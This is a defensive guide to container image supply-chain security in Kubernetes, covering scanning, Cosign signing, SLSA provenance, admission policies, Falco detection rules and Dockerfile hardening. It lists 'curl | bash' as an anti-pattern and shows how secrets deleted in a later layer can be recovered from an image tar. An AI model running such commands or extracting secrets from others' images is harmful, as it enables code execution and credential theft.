On This Page
  1. Image Threat Model
  2. Image Anatomy & Attack Surface
  3. Base Image Strategy
  4. Vulnerability Scanning
  5. Registry Security
  6. Image Signing with Cosign
  7. SLSA Provenance
  8. Policy Enforcement in Kubernetes
  9. Runtime Image Security
  10. Dockerfile Hardening
  11. Metrics, Alerts & Runbooks
  12. Best Practices
Coverage Checklist

Image Threat Model

Container images are a primary attack vector in Kubernetes. Compromised images bypass most runtime controls because the attack is baked in before the container ever starts.

Vulnerable Dependencies

OS packages and language libraries with known CVEs. Most breaches involve publicly disclosed vulnerabilities with available patches.

Malicious Base Images

Typosquatted or compromised public images on Docker Hub. mysql:lastest (typo), node:slim backdoored builds.

Secrets Baked In

API keys, TLS certs, SSH keys, or database passwords embedded in image layers via COPY, RUN, or ENV.

Unverified Provenance

No proof that an image was built from source you control. Compromised CI pipeline could inject malicious code without changing the tag.

Tag Mutability

Image tags are mutable. :latest or even :1.2.3 can be overwritten. Re-deploying the "same" tag may run different code.

Attack Chain

Compromised registry credentials → push malicious image with legitimate tag → Kubernetes pulls on next rollout → attacker code runs with pod's RBAC permissions and network access.

Image Anatomy & Attack Surface

Understanding the OCI image specification reveals exactly where each attack type enters.

Image Manifest ──────────────────────────────────────────────
├── Config (image config JSON) ← ENV vars, CMD, ENTRYPOINT
│ └── Attack: secrets in ENV, dangerous capabilities in config
└── Layers (ordered)
├── Layer 0: FROM ubuntu:22.04 ← base image CVEs
├── Layer 1: RUN apt-get install ← package CVEs added here
├── Layer 2: COPY . /app ← source code + possibly secrets
└── Layer N: RUN pip install ← library CVEs

# Secrets in deleted layers are still accessible
COPY secret.key /tmp/secret.key # Layer 3: secret present
RUN rm /tmp/secret.key # Layer 4: deleted — but Layer 3 is still in image!
Deleted Files Are Not Gone

OCI layers are additive. A file deleted in a later layer is still present in earlier layers and accessible via docker save image.tar && tar xf image.tar. Never add secrets to any layer, even temporarily.

Image Identity: Tag vs Digest

Reference TypeExampleMutable?Security Implication
Tagnginx:1.25.3YesRegistry owner can overwrite; no guarantee of content
Digestnginx@sha256:abc123...NoCryptographically immutable; content cannot change
Tag + Digestnginx:1.25.3@sha256:abc...NoBest of both: human-readable + immutable reference
Always Pin to Digest in Production

Tags are human convenience. Pin production workloads to digest references. Admission controllers can enforce this. Update digests as part of your dependency update process.

Base Image Strategy

The base image determines your initial attack surface. Smaller base images have fewer packages to patch and a smaller CVE surface.

Base ImageSizeShellPackage MgrUse CaseSecurity
ubuntu:22.04~77MBYesaptDevelopment, debuggingLow
debian:slim~75MBYesaptGeneral purposeMedium
alpine:3.19~7MBashapkSmall footprintMedium
gcr.io/distroless/base~20MBNoNoneCompiled binariesHigh
gcr.io/distroless/java17~200MBNoNoneJVM applicationsHigh
gcr.io/distroless/python3~100MBNoNonePython appsHigh
scratch0MBNoNoneStatic Go binariesHighest
Distroless Benefits

Distroless images contain only your application and its runtime dependencies — no shell, no package manager, no coreutils. This eliminates entire classes of post-exploitation techniques (reverse shells, package installation, script execution). The absence of a shell doesn't break kubectl exec entirely — use the debug container pattern with kubectl debug -it --image=busybox.

Multi-Stage Build Pattern

Multi-stage builds are the primary mechanism for separating build-time tools from the final image, preventing the leakage of build secrets and tools into production images.

# Stage 1: Build (all build deps, secrets, tools)
FROM golang:1.22 AS builder

WORKDIR /app

# Dependency layer (cached unless go.mod/sum changes)
COPY go.mod go.sum ./
RUN go mod download

# Source code
COPY . .

# Build static binary — no CGO means no glibc dependency
RUN CGO_ENABLED=0 GOOS=linux go build -ldflags="-w -s" -o /server ./cmd/server

# Stage 2: Final image — only the binary
FROM gcr.io/distroless/static-debian12:nonroot

# nonroot tag: runs as UID 65532 by default
COPY --from=builder /server /server

# Document the port (does not publish it)
EXPOSE 8080

# Use numeric UID to work with PodSecurityPolicy runAsNonRoot
USER 65532:65532

ENTRYPOINT ["/server"]
Build Secrets with --mount=type=secret

For private package registries during build, use BuildKit's secret mount — the secret is never written to any layer:

# BuildKit secret mount — never appears in any layer
RUN --mount=type=secret,id=npmrc,target=/root/.npmrc \
    npm install --production

# Build with:
# docker buildx build --secret id=npmrc,src=.npmrc .

Vulnerability Scanning

Vulnerability scanners match image packages and libraries against CVE databases (NVD, OSV, GHSA). They are a necessary but not sufficient security control — zero-day vulnerabilities have no CVE.

Scanning Tools Comparison

ToolTypeDatabasesFormatsKubernetes Integration
TrivyOpen sourceNVD, GHSA, OSV, language-specificJSON, SARIF, CycloneDX, SPDXOperator, CLI, CI/CD
GrypeOpen sourceNVD, GHSA, OSVJSON, SARIF, CycloneDXCLI, CI/CD
SnykCommercialSnyk DB (proprietary)JSON, SARIFOperator, admission webhook
Prisma Cloud (Twistlock)CommercialMultiple + runtimeMultipleDeep K8s integration
ClairOpen sourceNVD, RHEL, UbuntuJSONRegistry-integrated
Anchore GrypeOpen sourceMultipleJSON, CycloneDX, SPDXCLI, AnchoreCTL

Trivy Usage

# Scan image — includes OS packages and language libs
trivy image nginx:1.25.3

# Scan with severity filter (fail CI on CRITICAL/HIGH)
trivy image --exit-code 1 --severity CRITICAL,HIGH nginx:1.25.3

# SBOM-first scan: generate CycloneDX SBOM then scan it
trivy image --format cyclonedx --output sbom.json nginx:1.25.3
trivy sbom sbom.json

# Scan in-cluster images (requires kubeconfig)
trivy k8s --report summary cluster

# Scan a specific namespace
trivy k8s --namespace production --report all

# Ignore unfixed vulnerabilities (useful for reducing noise)
trivy image --ignore-unfixed nginx:1.25.3

# Scan with .trivyignore for known-acceptable CVEs
trivy image --ignorefile .trivyignore nginx:1.25.3

CVSS Scoring and Triage

SeverityCVSS ScoreActionSLA
Critical9.0–10.0Block deployment, immediate patch24–48 hours
High7.0–8.9Block deployment, patch in sprint7 days
Medium4.0–6.9Track, patch in next release30 days
Low0.1–3.9Track, patch opportunistically90 days
None0.0InformationalBest effort
CVSS Score Is Not Everything

CVSS score measures theoretical severity, not actual exploitability in your environment. A Critical CVE in a library that has no network path to an attacker is less urgent than a Medium CVE in your public API handler. Use CVSS as a starting point, not a final decision. Tools like VEX (Vulnerability Exploitability eXchange) provide exploitability context.

Trivy Operator — In-Cluster Continuous Scanning

# Install Trivy Operator via Helm
helm repo add aqua https://aquasecurity.github.io/helm-charts/
helm install trivy-operator aqua/trivy-operator \
  --namespace trivy-system \
  --create-namespace \
  --set="trivy.ignoreUnfixed=true"

# Operator creates VulnerabilityReport CRDs per workload
kubectl get vulnerabilityreports -A
kubectl describe vulnerabilityreport replicaset-nginx-abc123 -n production
# VulnerabilityReport CRD (auto-created by Trivy Operator)
apiVersion: aquasecurity.github.io/v1alpha1
kind: VulnerabilityReport
metadata:
  name: replicaset-nginx-abc123-nginx
  namespace: production
report:
  summary:
    criticalCount: 0
    highCount: 2
    mediumCount: 5
  vulnerabilities:
  - vulnerabilityID: CVE-2023-44487
    title: HTTP/2 Rapid Reset Attack
    severity: HIGH
    fixedVersion: 1.25.3
    resource: nginx

Registry Security

Registry Authentication

# Create imagePullSecret for private registry
kubectl create secret docker-registry regcred \
  --docker-server=registry.example.com \
  --docker-username=myuser \
  --docker-password=mypassword \
  --docker-email=ops@example.com \
  --namespace production

# Reference in pod spec
spec:
  imagePullSecrets:
  - name: regcred
  containers:
  - image: registry.example.com/myapp:1.2.3
# Attach imagePullSecret to ServiceAccount so all pods
# in the namespace automatically get it
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: production
imagePullSecrets:
- name: regcred
imagePullSecrets Are Namespace-Scoped

Attaching an imagePullSecret to the default ServiceAccount makes it available to all pods that use that SA in that namespace. For cross-namespace use, you must replicate the secret. Use tools like reflector or reloader to sync secrets across namespaces.

imagePullPolicy

PolicyBehaviorSecurity RiskWhen to Use
AlwaysPull on every pod startLowest — always gets latestProduction with mutable tags
IfNotPresentPull only if not on nodeMedium — cached image may be stalePinned digests
NeverNever pull, fail if absentHigh — relies on pre-loaded imagesAir-gapped environments
AlwaysPullImages Admission Plugin

Enabling the AlwaysPullImages admission plugin forces imagePullPolicy: Always on every pod, regardless of what the pod spec says. This prevents nodes from running images that a different tenant pulled previously. Without it, tenant A could reference an image from tenant B's namespace if it happens to be cached on the same node.

Registry Security Controls

ControlDescriptionImplementation
Private registryNo anonymous pullsHarbor, ECR, GCR, ACR with auth required
Image scanning gateBlock push if vulnerabilities exceed thresholdHarbor built-in, ECR Enhanced Scanning
Content trustOnly signed images allowedNotary v2, Cosign, registry policy
Repository RBACTeams can only push to their reposHarbor projects, ECR resource policies
Immutable tagsTags cannot be overwrittenECR immutable tags, Harbor tag retention
Geo-replicationImages closer to clustersHarbor replication, ECR replication
Audit loggingWho pushed/pulled whenRegistry audit logs → SIEM

Image Signing with Cosign

Cosign (part of the Sigstore project) enables cryptographic signing of container images, creating a verifiable link between an image digest and an identity that signed it.

── Key-based signing workflow ────────────────────────────────────────

CI/CD Pipeline

├─ Build image → push to registry
│ └── Image Digest: sha256:abc123...

├─ Sign with private key:
cosign sign --key cosign.key registry/image@sha256:abc123
│ └── Signature stored in registry as: registry/image:sha256-abc123.sig

└─ Push SBOM attestation:
cosign attest --key cosign.key --predicate sbom.json registry/image@sha256:abc123

── Verification at admission time ────────────────────────────────────

Admission Webhook (Kyverno / Policy Controller)

├─ Pod CREATE request arrives
├─ Extract image reference
├─ Fetch signature from registry
├─ Verify: cosign verify --key cosign.pub registry/image@sha256:abc123
└─ Allow (signature valid) or Deny (no valid signature)

Key-Based Signing

# Generate key pair (store private key in Vault/KMS, not CI env var)
cosign generate-key-pair

# Sign image (after push to registry)
cosign sign --key cosign.key \
  registry.example.com/myapp@sha256:abc123...

# Sign with KMS key (Google Cloud KMS example)
cosign sign --key gcpkms://projects/my-project/locations/global/keyRings/my-ring/cryptoKeys/cosign \
  registry.example.com/myapp@sha256:abc123...

# Verify image signature
cosign verify --key cosign.pub \
  registry.example.com/myapp@sha256:abc123...

# Verify outputs JSON with signer identity and timestamp

Keyless Signing (Sigstore)

Keyless signing uses ephemeral keys tied to OIDC identity (GitHub Actions, Google SA, etc.) and records signatures in the public Rekor transparency log. No long-lived private keys to manage or protect.

GitHub Actions

├─ OIDC token issued by GitHub (id_token: write permission)
iss: https://token.actions.githubusercontent.com
sub: repo:myorg/myrepo:ref:refs/heads/main

├─ cosign sign (SIGSTORE_NO_TLOG=false)
│ ├── Request ephemeral cert from Fulcio CA
│ │ └── Cert binds: OIDC identity ↔ ephemeral public key
│ ├── Sign image digest with ephemeral private key
│ └── Upload signature + cert to Rekor transparency log

└─ Ephemeral private key discarded

Verifier
├─ Fetch signature from registry
├─ Verify cert chain (Fulcio root CA)
├─ Verify signature with cert public key
├─ Check Rekor inclusion proof
└─ Verify cert subject matches expected OIDC identity
# Keyless sign in GitHub Actions (OIDC token available automatically)
- name: Sign image
  run: |
    cosign sign \
      --yes \
      registry.example.com/myapp@${{ steps.build.outputs.digest }}
  env:
    COSIGN_EXPERIMENTAL: "1"  # Not needed from cosign v2.0+

# Keyless verify — check identity matches expected GitHub workflow
cosign verify \
  --certificate-identity-regexp "https://github.com/myorg/myrepo/.github/workflows/.*" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  registry.example.com/myapp@sha256:abc123...

Attestations

# Attach SBOM as attestation (CycloneDX format)
cosign attest \
  --key cosign.key \
  --type cyclonedx \
  --predicate sbom.cyclonedx.json \
  registry.example.com/myapp@sha256:abc123...

# Attach SLSA provenance as attestation
cosign attest \
  --key cosign.key \
  --type slsaprovenance \
  --predicate provenance.json \
  registry.example.com/myapp@sha256:abc123...

# Verify attestation
cosign verify-attestation \
  --key cosign.pub \
  --type cyclonedx \
  registry.example.com/myapp@sha256:abc123... | \
  jq .payload | base64 -d | jq .

SLSA Provenance

SLSA (Supply chain Levels for Software Artifacts, pronounced "salsa") is a framework of incrementally adoptable security levels for software supply chains, defined by Google and the OpenSSF.

LevelRequirementsWhat It Prevents
SLSA 0No guaranteesNothing
SLSA 1Provenance generated (not authenticated)Accidental mistakes; provides artifact lineage
SLSA 2Signed provenance from hosted build serviceTampering after the build; identifies build service
SLSA 3Hardened build platform; non-forgeable provenanceCompromised build service modifying artifacts
SLSA 4Two-person review; hermetic buildsInsider threats; reproducible builds verification
SLSA Level 3 Is the Practical Target

SLSA 3 requires a hosted, hardened build platform (GitHub Actions, Google Cloud Build, etc.) that generates non-forgeable provenance. This is achievable with existing CI/CD tooling. SLSA 4 requires hermetic and reproducible builds which many projects cannot achieve today.

SLSA Provenance with GitHub Actions

# .github/workflows/release.yaml
jobs:
  build:
    permissions:
      id-token: write     # For OIDC / Sigstore
      contents: read
      packages: write     # For pushing to GHCR
    steps:
    - uses: actions/checkout@v4
    - name: Build and push
      id: build
      uses: docker/build-push-action@v5
      with:
        push: true
        tags: ghcr.io/myorg/myapp:${{ github.sha }}

  provenance:
    needs: [build]
    uses: slsa-framework/slsa-github-generator/.github/workflows/generator_container_slsa3.yml@v1.10.0
    with:
      image: ghcr.io/myorg/myapp
      digest: ${{ needs.build.outputs.digest }}
    permissions:
      id-token: write
      contents: read
      packages: write
      actions: read
# Verify SLSA provenance
slsa-verifier verify-image \
  --source-uri github.com/myorg/myapp \
  --source-tag v1.2.3 \
  ghcr.io/myorg/myapp@sha256:abc123...

Policy Enforcement in Kubernetes

Kyverno verifyImages

Kyverno's verifyImages rule validates image signatures and attestations at admission time. It supports Cosign key-based, keyless, and attestation verification.

# Kyverno ClusterPolicy: require signed images from trusted registry
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  background: false   # Don't check existing pods
  rules:
  - name: verify-signature
    match:
      any:
      - resources:
          kinds: [Pod]
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestors:
      - entries:
        - keys:
            publicKeys: |-
              -----BEGIN PUBLIC KEY-----
              MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE...
              -----END PUBLIC KEY-----
      mutateDigest: true   # Replace tag with verified digest
      verifyDigest: true   # Ensure image ref uses digest
      required: true
# Kyverno verifyImages: keyless (Sigstore) verification
    verifyImages:
    - imageReferences:
      - "ghcr.io/myorg/*"
      attestors:
      - entries:
        - keyless:
            subject: "https://github.com/myorg/myrepo/.github/workflows/release.yaml@refs/heads/main"
            issuer: "https://token.actions.githubusercontent.com"
            rekor:
              url: https://rekor.sigstore.dev
# Kyverno verifyImages: verify SBOM attestation exists
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestations:
      - type: https://cyclonedx.org/bom
        attestors:
        - entries:
          - keys:
              publicKeys: "..."
        conditions:
        - all:
          - key: "{{ components | length(@) }}"
            operator: GreaterThan
            value: "0"

Registry Allow-List with Kyverno

# Block images from untrusted registries
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-image-registries
spec:
  validationFailureAction: Enforce
  rules:
  - name: validate-registries
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: "Images must come from registry.example.com or gcr.io/distroless"
      pattern:
        spec:
          containers:
          - image: "registry.example.com/* | gcr.io/distroless/*"

OPA Gatekeeper: Digest Pinning Policy

# ConstraintTemplate: require digest-pinned images
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8srequiredimagedigest
spec:
  crd:
    spec:
      names:
        kind: K8sRequiredImageDigest
  targets:
  - target: admission.k8s.gatekeeper.sh
    rego: |
      package k8srequiredimagedigest

      violation[{"msg": msg}] {
        container := input.review.object.spec.containers[_]
        not contains(container.image, "@sha256:")
        msg := sprintf("Container '%v' image '%v' must use digest pinning (@sha256:...)", [container.name, container.image])
      }

      violation[{"msg": msg}] {
        container := input.review.object.spec.initContainers[_]
        not contains(container.image, "@sha256:")
        msg := sprintf("InitContainer '%v' image '%v' must use digest pinning", [container.name, container.image])
      }

ValidatingAdmissionPolicy (CEL): Registry Check

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: check-image-registry
spec:
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: [v1]
      operations: [CREATE, UPDATE]
      resources: [pods]
  validations:
  - expression: >
      object.spec.containers.all(c,
        c.image.startsWith("registry.example.com/") ||
        c.image.startsWith("gcr.io/distroless/")
      )
    message: "Images must come from approved registries"
  - expression: >
      object.spec.containers.all(c,
        c.image.contains("@sha256:")
      )
    message: "Images must be pinned to a digest"

Runtime Image Security

Falco Rules for Image Anomalies

Falco detects runtime behavior that indicates a compromised or malicious image. Crucially, Falco detects but does not prevent — pair it with admission controls for prevention.

# Falco rule: detect container running as root
- rule: Container Running as Root
  desc: Detect containers running as root user
  condition: >
    container and
    proc.vpid=1 and
    user.uid=0 and
    not container.image.repository in (trusted_root_images)
  output: >
    Container running as root (user=%user.name image=%container.image.repository
    container=%container.name pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: WARNING

# Falco rule: detect unexpected network connection from container
- rule: Unexpected Outbound Connection
  desc: Detect outbound network connections to unusual destinations
  condition: >
    outbound and
    container and
    not fd.sport in (allowed_outbound_ports) and
    not fd.sip in (allowed_outbound_ips)
  output: >
    Unexpected outbound connection (image=%container.image.repository
    connection=%fd.name pod=%k8s.pod.name)
  priority: CRITICAL

# Falco rule: detect binary execution in container
- rule: Unexpected Process in Container
  desc: Detect execution of binaries not expected in container
  condition: >
    spawned_process and
    container and
    not proc.name in (allowed_processes) and
    not proc.pname in (allowed_parent_processes)
  output: >
    Unexpected process (proc=%proc.name pproc=%proc.pname
    image=%container.image.repository pod=%k8s.pod.name)
  priority: ERROR

Image Pull Verification Workflow

1

Pod CREATE Request

Admission webhook intercepts the pod creation request before it reaches etcd.

2

Registry Allow-List Check

Validate image references start with approved registry prefixes. Reject images from Docker Hub or unrecognized registries.

3

Digest Pinning Check

Validate image references contain @sha256: digest. Reject mutable tag-only references.

4

Signature Verification

Fetch and verify Cosign signature from registry. Validate against trusted public keys or OIDC identity constraints.

5

Admission Allowed

Image reference mutated to verified digest (if tag was supplied). Pod created with immutable image reference.

Dockerfile Hardening

Complete Hardened Dockerfile

###############################################################
# Stage 1: Dependency download (separate for better caching)
###############################################################
FROM node:20-alpine3.19 AS deps

WORKDIR /app

# Copy only manifests first — layer cache: only invalidated when deps change
COPY package.json package-lock.json ./
RUN npm ci --only=production --ignore-scripts

###############################################################
# Stage 2: Application build
###############################################################
FROM node:20-alpine3.19 AS build

WORKDIR /app
COPY package.json package-lock.json ./
RUN npm ci                          # include devDeps for build
COPY . .
RUN npm run build

###############################################################
# Stage 3: Production image
###############################################################
FROM node:20-alpine3.19

# Upgrade OS packages to get latest CVE fixes
RUN apk update && apk upgrade --no-cache && rm -rf /var/cache/apk/*

# Create non-root user with fixed UID (important for runAsNonRoot + runAsUser)
RUN addgroup -g 10001 -S appgroup && \
    adduser  -u 10001 -S appuser -G appgroup

WORKDIR /app

# Copy artifacts from build stages (not source code or devDeps)
COPY --from=deps   --chown=appuser:appgroup /app/node_modules ./node_modules
COPY --from=build  --chown=appuser:appgroup /app/dist         ./dist
COPY               --chown=appuser:appgroup package.json      .

# Drop to non-root user
USER 10001:10001

# Document (do not publish) the application port
EXPOSE 3000

# Use exec form (not shell form) to ensure signals propagate correctly
ENTRYPOINT ["node", "dist/server.js"]

Dockerfile Anti-Patterns

Anti-PatternRiskFix
FROM ubuntu:latestNon-reproducible, mutablePin to specific digest: FROM ubuntu:22.04@sha256:...
USER root (final image)Container runs as rootAdd non-root user, use USER 10001
COPY . . without .dockerignoreSource secrets, .env copiedAdd .dockerignore; copy specific files
ENV API_KEY=secretSecret in image layers foreverUse runtime injection: K8s Secrets or ESO
RUN curl | bashArbitrary code execution at build timePin to specific version + verify checksum
RUN apt-get install && rm -rf /var/lib/aptPackage manager remains; packages cachedMulti-stage; apt in build stage only
ADD https://... /app/Remote content without verificationUse RUN curl -L URL | sha256sum -c -
No HEALTHCHECKKubernetes can't detect app-level failureAdd HEALTHCHECK or use liveness probe

.dockerignore

# .dockerignore — always include this file
.git
.gitignore
*.md
.env
.env.*
*.key
*.pem
*.cert
*.crt
node_modules
dist
coverage
.DS_Store
Dockerfile*
docker-compose*
.github
tests
__tests__
*.test.ts
*.spec.ts

Metrics, Alerts & Runbooks

Key Metrics

MetricSourceDescription
trivy_vulnerability_idTrivy OperatorPer-image CVE count by severity
kyverno_policy_results_totalKyvernoPolicy pass/fail counts by policy name
image_pull_errors_totalkubeletFailed image pull attempts (ErrImagePull, ImagePullBackOff)
cosign_verification_duration_secondsCustom webhookSignature verification latency at admission
falco_events_totalFalcoRuntime security events by rule name

Alerts

# Alert: Critical CVE in running workload
- alert: CriticalCVEInRunningWorkload
  expr: sum by (namespace, workload, image) (trivy_vulnerability_id{severity="CRITICAL"}) > 0
  for: 5m
  annotations:
    summary: "Critical CVE in {{ $labels.workload }} ({{ $labels.namespace }})"

# Alert: Image from untrusted registry blocked
- alert: UntrustedRegistryBlocked
  expr: increase(kyverno_policy_results_total{policy="restrict-image-registries",result="fail"}[5m]) > 0
  annotations:
    summary: "Attempt to deploy image from untrusted registry"

# Alert: Signature verification failures spike
- alert: ImageSignatureVerificationFailure
  expr: increase(kyverno_policy_results_total{policy="verify-image-signatures",result="fail"}[5m]) > 3
  annotations:
    summary: "Multiple image signature verification failures — possible supply chain attack"

# Alert: Falco runtime anomaly
- alert: FalcoRuntimeAnomaly
  expr: increase(falco_events_total{priority=~"CRITICAL|ERROR"}[5m]) > 0
  annotations:
    summary: "Falco detected runtime anomaly: {{ $labels.rule }}"

Runbooks

Critical CVE in Production

1. Identify affected images: kubectl get vulnerabilityreports -A
2. Check if CVE is exploitable (network path? fix available?)
3. Update base image or package, rebuild, re-sign, redeploy
4. If no fix: apply compensating controls (NetworkPolicy, seccomp)

ImagePullBackOff

1. Check events: kubectl describe pod <name>
2. Verify imagePullSecret exists and is valid
3. Verify registry is reachable from node
4. Check if admission policy mutated the image reference unexpectedly

Signature Verification Failure Spike

1. Check which images are failing: Kyverno PolicyReport
2. Verify CI pipeline is signing correctly
3. Check if public key in policy matches signing key
4. Investigate for unauthorized image push attempts

Falco Runtime Alert

1. Identify pod: kubectl get pod -n <ns> <name>
2. Capture forensics: kubectl debug -it --image=busybox
3. Consider immediate isolation: remove from Service, cordon node
4. Preserve evidence before terminating pod

Registry Credential Rotation

1. Create new imagePullSecret with new credentials
2. Update ServiceAccount or pod specs
3. Roll deployments: kubectl rollout restart deployment
4. Revoke old credentials in registry

Best Practices

1

Pin all images to digest in production

Tags are mutable. Use image@sha256: references for all production workloads. Automate digest updates with tools like Renovate or Dependabot.

2

Use distroless or scratch base images

Eliminate shell access, package managers, and unneeded utilities from production images. This removes entire attack classes post-exploitation.

3

Scan in CI and block on critical/high CVEs

Run trivy image --exit-code 1 --severity CRITICAL,HIGH in every build pipeline. Never deploy images that fail the threshold.

4

Sign every image with Cosign

Adopt keyless signing via GitHub Actions OIDC for zero key management overhead. Verify signatures at admission with Kyverno verifyImages.

5

Enforce registry allow-list at admission

Use Kyverno or ValidatingAdmissionPolicy to reject images from unapproved registries. Docker Hub images should be mirrored to your private registry before use.

6

Never bake secrets into images

Use BuildKit's --mount=type=secret for build-time secrets. Inject runtime secrets via Kubernetes Secrets or an external secrets operator — not ENV in Dockerfile.

7

Enable AlwaysPullImages in multi-tenant clusters

The AlwaysPullImages admission plugin prevents cross-tenant image cache exploitation. Performance impact is mitigated by registry proximity (same datacenter).

8

Deploy Trivy Operator for continuous scanning

One-time CI scans miss new CVEs in running workloads. The Trivy Operator continuously scans running images and surfaces new vulnerabilities via VulnerabilityReport CRDs.